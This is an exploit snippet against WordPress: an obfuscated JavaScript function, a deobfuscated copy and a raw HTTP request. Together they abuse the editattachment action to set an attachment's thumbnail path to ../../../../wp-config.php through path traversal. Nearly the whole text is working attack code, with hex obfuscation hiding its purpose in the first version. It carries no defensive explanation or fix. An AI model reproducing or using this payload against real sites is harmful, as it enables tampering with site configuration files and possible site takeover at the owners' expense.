var _0x6111=["\x6c\x6f\x67", "\x61\x63\x74\x69\x6f\x6e\x3d\x65\x64\x69\x74\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x26\x74\x68\x75\x6d\x62\x3d\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x77\x70\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70\x26\x5f\x77\x70\x6e\x6f\x6e\x63\x65\x3d", "\x6f\x6e\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6e\x67\x65", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x54\x68\x75\x6d\x62\x20\x77\x61\x73\x20\x73\x65\x74\x20\x74\x6f\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x77\x70\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70", "\x50\x4f\x53\x54", "\x2f\x77\x70\x2d\x61\x64\x6d\x69\x6e\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x3f\x70\x6f\x73\x74\x3d", "\x6f\x70\x65\x6e", "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65", "\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x65\x6e\x64"]; function setThumbToConfig(_0x95ccx2, _0x95ccx3){console[_0x6111[0]](_0x95ccx2);var _0x95ccx4= _0x6111[1] + _0x95ccx3; var _0x95ccx5= new XMLHttpRequest(); _0x95ccx5[_0x6111[2]]= function(){if(this[_0x6111[3]] == 4){console[_0x6111[0]](_0x6111[4])}}; _0x95ccx5[_0x6111[7]](_0x6111[5], _0x6111[6]+ _0x95ccx2, true); _0x95ccx5[_0x6111[10]](_0x6111[8], _0x6111[9]); _0x95ccx5[_0x6111[11]](_0x95ccx4)}



Deobfuscated:
var _0x6111=["log",
"action=editattachment&thumb=../../../../wp-config.php&_wpnonce=",
"onreadystatechange", 
"readyState", 
"Thumb was set to ../../../../wp-config.php", 
"POST", 
"/wp-admin/post.php?post=", 
"open", 
"Content-type", 
"application/x-www-form-urlencoded", 
"setRequestHeader", 
"send"]; 

function setThumbToConfig(postid, wpnonce)
{
	console["log"](postid);
	var postdata= "action=editattachment&thumb=../../../../wp-config.php&_wpnonce=" + wpnonce; 
	var xhr= new XMLHttpRequest(); 
	xhr["onreadystatechange"]= function(){if(this["readyState"] == 4){console["log"]("Thumb was set to ../../../../wp-config.php")}}; 
	xhr["open"]("POST", "/wp-admin/post.php?post="+ postid, true); 
	xhr["setRequestHeader"]("Content-type", "application/x-www-form-urlencoded"); 
	xhr["send"](postdata)
}

Real vulnerability trigger:

POST /wp-admin/post.php?post=postid HTTP/1.1
Host: IP

action=editattachment&thumb=../../../../wp-config.php&_wpnonce=
